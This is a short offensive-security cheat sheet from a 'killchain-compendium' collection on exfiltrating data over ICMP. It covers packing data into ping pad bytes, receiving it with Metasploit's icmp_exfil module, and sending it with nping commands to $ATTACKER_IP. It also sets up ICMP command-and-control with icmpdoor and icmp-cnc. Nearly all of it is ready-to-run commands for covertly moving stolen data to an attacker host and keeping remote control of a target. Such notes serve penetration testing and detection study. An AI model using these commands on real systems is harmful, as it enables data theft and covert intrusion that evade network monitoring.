killchain-compendium/exfiltration/icmp.md

2.0 KiB

ICMP Exfiltration

  • ICMP Types

  • Type 0, which is Echo Reply contains an optional data field inside the header

 0                   1                   2                   3  
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      Type     |      Code     |            Checksum           |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Identifier          |        Sequence Number        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
+                              Data                             +
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Usage

  • The Pattern parameter can be used to pad the bytes. From the manual
 -p pattern
           You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing
           data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.
  • Pad hex values
ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p )

Metasploit ICMP Exfiltration

  • Awaiting ICMP data on Attacker
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src $ATTACKER_IP
set interface <interface>
run
  • Exfiltrating from target via ping shown above or use nping
  • Starting the transmission via nping and BOF
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF"

C2 over ICMP

sudo icmpdoor -i <interface> -d $ATTACKER_IP
  • On attacker
sudo icmp-cnc -i <interface> -d $TARGET_IP